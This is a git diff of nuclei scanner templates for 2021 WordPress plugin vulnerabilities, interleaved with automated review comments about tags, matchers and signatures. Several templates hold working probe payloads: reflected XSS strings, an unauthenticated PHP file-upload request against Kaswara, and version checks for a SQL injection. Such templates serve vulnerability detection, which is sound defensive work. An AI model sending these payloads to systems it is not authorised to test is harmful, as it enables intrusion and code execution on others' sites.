@@ -39,5 +66,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/19 +# digest: 490a0046304402206fc7f4432dfb77192a80cf4d997a216a19b49797038590bc872b29213ac7583702203b5e05a054ce8e225e79baf93062589c32a2ca5381d2dbe7b305083323a93600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24215.yaml b/nuclei-templates/CVE-2021/CVE-2021-24215.yaml index 28e78e21c9..663bb6f686 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24215.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24215.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24215 cwe-id: CWE-425,CWE-284 - epss-score: 0.07074 - epss-percentile: 0.93283 + epss-score: 0.19113 + epss-percentile: 0.9615 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: product: controlled_admin_access framework: wordpress publicwww-query: /wp-content/plugins/controlled-admin-access/ - tags: cve,cve2021,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access + tags: cve2021,cve,authenticated,wpscan,wordpress,wp-plugin,wp,controlled-admin-access,wpruby http: - raw: @@ -49,4 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4a0a00473045022013b479f4f410acfdfb3301d103479ad1cfc917c18b27f2bef2033bd51a62cf33022100b919927b38062637e7d7548773b2dd24b78978e550eff0b1980ad429eed014fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce8b5d92f92657b495f0d0e99056e7b9bb7f133c8b77529959e1c2851b9051a9022055704998cb439b67c0756f7a39ac3850f241afa4666f6b8ded396450dcb59f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24226.yaml b/nuclei-templates/CVE-2021/CVE-2021-24226.yaml deleted file mode 100644 index 26a6c6b694..0000000000 
--- a/nuclei-templates/CVE-2021/CVE-2021-24226.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2021-24226 -info: - name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage - author: dhiyaneshDK - severity: high - description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. - reference: - - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2021-24226 - cwe-id: CWE-200 - tags: wordpress,cve,cve2021,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - '
alert(document.domain);") && contains(body, "invitaion-code-table")' condition: and -# digest: 4a0a0047304502210086d3d3e184d6a9be220f658380cdca7fca88fbc2b1af53e9554e5c7310d39391022022dda7bb82664acee182d59cb4d7082c7e4faed61b2961741b17e7b53f3837ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201ee2a4557fba7636af6a7f66ace986f366c1b8b98975c008971287a6b7b66d2802204e5cace0f361c36db2bc2e80e1931aba048e7cf304d3668b487400cad63f4773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24245.yaml b/nuclei-templates/CVE-2021/CVE-2021-24245.yaml deleted file mode 100644 index 9e7991f39e..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24245.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-24245 - -info: - name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting - author: edoardottt - severity: medium - description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags. - reference: - - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html - - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24245 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24245 - cwe-id: CWE-79 - tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,packetstorm - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP+Cookie+check; - - log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - - type: word - part: body - words: - - "ad\" accesskey=X onclick=alert(1)" - -# Enhanced by mp on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/cve-2021-24274.yaml b/nuclei-templates/CVE-2021/CVE-2021-24274.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24274.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24274.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml index f89c216090..f2e969c7a6 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml 
@@ -1,15 +1,10 @@ id: CVE-2021-24284 - info: - name: WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload + name: WordPress Kaswara Modern VC Addons - File Upload RCE author: lamscun,pussycat0x,pdteam severity: critical description: | - WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. - impact: | - Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website. - remediation: | - Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability. + The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. reference: - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 
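Review bot: This hunk removes the `impact:` and `remediation:` blocks and replaces the versioned name `<=3.0.1 - Arbitrary File Upload` with the unversioned `File Upload RCE`, which runs against the rest of this commit, where templates are gaining `impact:` blocks and versioned names rather than losing them. It reads as an older copy of the template overwriting the newer one rather than a deliberate edit. Keeping the removed `impact:` and `remediation:` text and the `<=3.0.1` name preserves the information a triager needs without changing detection.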
@@ -22,23 +17,12 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - epss-score: 0.96657 - epss-percentile: 0.99614 - cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 2 - vendor: kaswara_project - product: kaswara - framework: wordpress - tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project - + tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" - string: "CVE-2021-24284" - php_cmd: "" - -http: + php_cmd: "" +requests: - raw: - | POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 @@ -62,20 +46,17 @@ http: - | GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 Host: {{Hostname}} - + req-condition: true matchers-condition: and matchers: - type: word part: body_1 words: - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - - type: word part: body_2 words: - - '{{md5(string)}}' - + - "phpinfo()" - type: status status: - 200 -# digest: 4a0a00473045022100f0e469315d27c1e2b10e7997e7bd0501633f74806e35bf505925a7267a1eaee502204bacf6f2af3b3841aea43702a619a936d0ddcde2bd2b41be0be741e4f77e6778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24285.yaml b/nuclei-templates/CVE-2021/CVE-2021-24285.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24285.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24285.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24286.yaml b/nuclei-templates/CVE-2021/CVE-2021-24286.yaml index e3b6286721..44f7dffcf1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24286.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24286.yaml @@ -1,5 +1,4 @@ id: CVE-2021-24286 - info: name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting author: geeknik 
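Review bot: The rewritten body_2 matcher in the following hunk expects the literal `phpinfo()` string, but `php_cmd` stays `""` on both sides of this hunk, so unless the upload body is assembled elsewhere in the template the second request can never produce that output and the check silently never fires; the removed `{{md5(string)}}` match was tied to the `string` variable this hunk also deletes and is the deterministic form. This hunk also moves from `http:` back to the legacy `requests:` key and drops `max-request`, and the next hunk adds the legacy `req-condition: true` and removes the `# digest:` signature line, leaving the template unsigned. Restoring `string: "CVE-2021-24284"`, the `- '{{md5(string)}}'` words entry and the digest line keeps detection deterministic and the template verifiable. The POST body that consumes `php_cmd` lies outside these hunks.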
@@ -7,12 +6,10 @@ info: reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 severity: medium tags: cve,cve2021,xss - requests: - method: GET path: - "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);" - matchers-condition: and matchers: - type: word diff --git a/nuclei-templates/CVE-2021/CVE-2021-24287.yaml b/nuclei-templates/CVE-2021/CVE-2021-24287.yaml index 4c51d66e9d..74cc20d62f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24287.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24287.yaml 
@@ -6,19 +6,22 @@ info: severity: medium description: | WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.3.2. reference: - https://www.exploit-db.com/exploits/50349 - https://wpscan.com/vulnerability/56e1bb56-bfc5-40dd-b2d0-edef43d89bdf - https://wordpress.org/plugins/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24287 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24287 cwe-id: CWE-79 - epss-score: 0.00177 - epss-percentile: 0.54794 + epss-score: 0.00231 + epss-percentile: 0.60494 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: mooveagency product: select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons framework: wordpress - tags: wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,cve2021,xss,wp-plugin,cve,wordpress,edb + tags: cve2021,cve,wp,select-all-categories,taxonomies-change-checkbox-to-radio-buttons,authenticated,wpscan,xss,wp-plugin,wordpress,edb,mooveagency http: - raw: 
@@ -47,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "Set up the taxonomies")' condition: and -# digest: 4a0a00473045022030a560a5c07626c72709d689a6c2ab6dfcc0a5a767ff25cf3f105b5c2ac5eae90221008a0f57a80a4d1f036d9996eb44b9263a3e0cf91a6cfb5dea0bccfb921d61102d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220331de77e11f4fd8c6eb5947ea08b967c217e35cecc249be01ac24e264c67cb8402205f29a68c7018c29021c2f9a42175170a1c54ed085d505a1ed2d012236cac7ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-24291.yaml b/nuclei-templates/CVE-2021/CVE-2021-24291.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24291.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24291.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml b/nuclei-templates/CVE-2021/CVE-2021-24300.yaml index 33ab74ea05..04d0926f66 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24300.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24300.yaml @@ -1,5 +1,4 @@ id: CVE-2021-24300 - info: name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS author: cckuailong @@ -14,7 +13,6 @@ info: cve-id: CVE-2021-24300 cwe-id: CWE-79 tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - requests: - raw: - | @@ -28,7 +26,6 @@ requests: - | GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: @@ -38,12 +35,10 @@ requests: - 'value="\"onmouseover=alert(document.domain);//">' - "PickPlugins Product Slider" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 
diff --git a/nuclei-templates/CVE-2021/cve-2021-24335.yaml b/nuclei-templates/CVE-2021/CVE-2021-24335.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24335.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24335.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24347.yaml b/nuclei-templates/CVE-2021/CVE-2021-24347.yaml index 44c78cc587..4177f7e372 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24347.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24347.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site. remediation: Fixed in version 4.22. reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a @@ -17,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-24347 cwe-id: CWE-178 - epss-score: 0.96951 - epss-percentile: 0.9966 + epss-score: 0.97036 + epss-percentile: 0.99699 cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: smartypantsplugins product: sp_project_\&_document_manager framework: wordpress - tags: sp-client-document-manager,wpscan,cve,wp-plugin,wp,authenticated,wordpress,cve2021,rce,packetstorm,intrusive + tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins http: - raw: 
@@ -99,4 +101,4 @@ http: regex: - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)" internal: true -# digest: 490a0046304402201efdb38e7f78d3e9e3dc741544c1525190a14dea497989a6414146d4a34d2026022019290fd72e41e0578668f4b65b3c17ce41825eca3c5304b2cb9e5da70679f88d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24351.yaml b/nuclei-templates/CVE-2021/CVE-2021-24351.yaml index f6fed292bc..6406ee8919 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24351.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24351.yaml 
@@ -6,26 +6,30 @@ info: severity: medium description: | WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016 - https://theplusaddons.com/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24351 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/JoshMorrison99/my-nuceli-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24351 cwe-id: CWE-79 - epss-score: 0.00145 - epss-percentile: 0.50199 + epss-score: 0.00154 + epss-percentile: 0.50743 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: posimyth product: the_plus_addons_for_elementor framework: wordpress - tags: cve2021,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,cve + tags: cve2021,cve,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,posimyth http: - raw: 
@@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024e98f0f5b2965f78ab57c62d96737c5001b2285dc70cc044fb1ab99178fa614022100e49e417af37c9e95ddb7cb9577b2cc0ae9dc566ded8b815b52db7c0764b72c2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0eaf8ef2a2056147b9485f4d77a8844b65eac6cfb6216d78f3290313d7a3c0d0221008186ee4d441d90db81008c8d1396a431a4347efa93ae3069c01eab7a2b1ee18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24370.yaml b/nuclei-templates/CVE-2021/CVE-2021-24370.yaml new file mode 100644 index 0000000000..a06cf1d193 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24370.yaml 
@@ -0,0 +1,55 @@ +id: CVE-2021-24370 + +info: + name: WordPress Fancy Product Designer <4.6.9 - Arbitrary File Upload + author: pikpikcu + severity: critical + description: | + WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication. + impact: | + Attackers can upload malicious files and execute arbitrary code on the target system. + remediation: | + Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability. + reference: + - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/ + - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38 + - https://seclists.org/fulldisclosure/2020/Nov/30 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24370 + - https://www.secpod.com/blog/critical-zero-day-flaw-actively-exploited-in-wordpress-fancy-product-designer-plugin/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24370 + cwe-id: CWE-434 + epss-score: 0.11015 + epss-percentile: 0.95013 + cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: radykal + product: fancy_product_designer + framework: wordpress + google-query: inurl:“/wp-content/plugins/fancy-product-designer” + tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"error":"You need to define a directory' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 
4b0a00483046022100c2a776e835f61bf3a78c76dd792d53c9c3bcfaf7974a24228b4f5e0a66ab0f2902210097e6ed969dab62237e84218f8f15915a107d24ce90adc20993b9d949a9e68aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24385.yaml b/nuclei-templates/CVE-2021/CVE-2021-24385.yaml index 47849aa752..12fd1dd4c1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24385.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24385.yaml 
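Review bot: `google-query: inurl:“/wp-content/plugins/fancy-product-designer”` uses typographic quotes (U+201C/U+201D) rather than ASCII `"`, so the dork is not parsed as a quoted phrase when copied into a search engine and differs from the `inurl:"..."` form used by the Filebird template in this same diff; change it to `google-query: inurl:"/wp-content/plugins/fancy-product-designer"`. The header matcher requires `text/html` while the body matcher expects a JSON-style `{"error":"You need to define a directory` string; that is presumably how the handler responds, but with `matchers-condition: and` a different content type becomes a silent miss, so it is worth confirming on a live instance or dropping the header matcher.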
@@ -1,31 +1,46 @@ id: CVE-2021-24385 info: - name: Filebird < 4.7.4 - Unauthenticated SQL Injection - author: akincibor + name: > + Filebird 4.7.3 - Unauthenticated SQL Injection + author: topscoder severity: critical - description: The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user. + description: > + The Filebird Plugin 4.7.3 introduced a SQL injection vulnerability as it is making SQL queries without escaping user input data from a HTTP post request. This is a major vulnerability as the user input is not escaped and passed directly to the get_col function and it allows SQL injection. The Rest API endpoint which invokes this function also does not have any required permissions/authentication and can be accessed by an anonymous user. 
reference: - - https://wpscan.com/vulnerability/754ac750-0262-4f65-b23e-d5523995fbfa - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2491d502-8087-4e95-b047-a3b196322d94?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24385 + metadata: + fofa-query: "wp-content/plugins/filebird/" + google-query: inurl:"/wp-content/plugins/filebird/" + shodan-query: 'vuln:CVE-2021-24385' + tags: cve,wordpress,wp-plugin,filebird,critical -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/filebird/readme.txt' + - "{{BaseURL}}/wp-content/plugins/filebird/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "FileBird" + - "filebird" part: body - type: dsl dsl: - - compare_versions(version, '< 4.7.4') \ No newline at end of file + - compare_versions(version, '4.7.3') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24409.yaml b/nuclei-templates/CVE-2021/CVE-2021-24409.yaml index f26e4c26fd..f91d354aeb 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24409.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24409.yaml 
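Review bot: The rewritten tags line `tags: cve,wordpress,wp-plugin,filebird,critical` drops `cve2021`, `sqli` and `unauth`, which every other template in this commit keeps (the rest of the diff is normalising tags to begin with `cve2021,cve`), and adds `critical`, which duplicates `severity`; suggest `tags: cve2021,cve,sqli,wp,wordpress,wp-plugin,unauth,filebird`. The new `classification` block has no `cwe-id: CWE-89` although the description is a SQL injection, and the wpscan reference is removed rather than kept next to the wordfence one. Both extractors are now named `version`, one `internal: true` and one not; giving the externally reported one a distinct name removes ambiguity about which value the `dsl` matcher reads.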
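Review bot: `compare_versions(version, '4.7.3')` passes a bare version with no operator, which nuclei's constraint syntax treats as an exact-equality test, so only a readme reporting exactly 4.7.3 matches and a 4.7.3.x build is missed. If the intent is "introduced in 4.7.3, fixed in 4.7.4", `- compare_versions(version, '>= 4.7.3', '< 4.7.4')` states that explicitly and is consistent with the `< 4.7.4` gate being replaced. The word change from `FileBird` to `filebird` is case-sensitive unless the matcher sets `case-insensitive: true`; the same lowercase-word change appears in the Tutor LMS hunk at the top of this chunk.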
@@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking. remediation: Fixed in version 2.8 reference: - https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf @@ -15,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24409 cwe-id: CWE-79 - epss-score: 0.00188 - epss-percentile: 0.56172 + epss-score: 0.00161 + epss-percentile: 0.51755 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: product: prismatic framework: wordpress publicwww-query: "/wp-content/plugins/prismatic" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,prismatic,authenticated + tags: cve2021,cve,wpscan,wordpress,wp,wp-plugin,xss,prismatic,authenticated,plugin-planet http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and -# digest: 490a0046304402202942c50fbf7bf1294a2bca04ea6c75f30affca721513ba5fae26662cb41a744c02203ca3eba39c430acf695ef0646f86a0697c25b9fc788f15c49795ddb2257fcc61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3a272b73b275993030f6cb84ddacf46958fd51cea8bbee3478f27a93413c9a9022100a4d5c436e634b4c03e12c36e668f37d9d2b56c11fc8527edf562c96413535d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24435.yaml b/nuclei-templates/CVE-2021/CVE-2021-24435.yaml index 6a612a9a13..e8d4e6ca7e 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24435.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24435.yaml 
@@ -6,19 +6,22 @@ info: severity: medium description: | The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/a88ffc42-6611-406e-8660-3af24c9cc5e8 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24435 - https://nvd.nist.gov/vuln/detail/CVE-2021-24435 - https://patchstack.com/database/vulnerability/titan-framework/wordpress-titan-framework-plugin-1-12-1-reflected-cross-site-scripting-xss-vulnerability + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49432 + epss-percentile: 0.4866 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: gambit product: titan_framework framework: wordpress - tags: wp,xss,wp-plugin,titan-framework,wpscan,cve,cve2021,wordpress + tags: cve2021,cve,wp,xss,wp-plugin,titan-framework,wpscan,wordpress,gambit http: - method: GET @@ -53,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009520e207a798498c4436f2eb4315a0cd962a41bd6958665705b91c157f4a3c6d022100811df242ef8ffc8303493f7be1dcee1df01d06040e8694b6e69e23ffe445b219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950 \ No newline 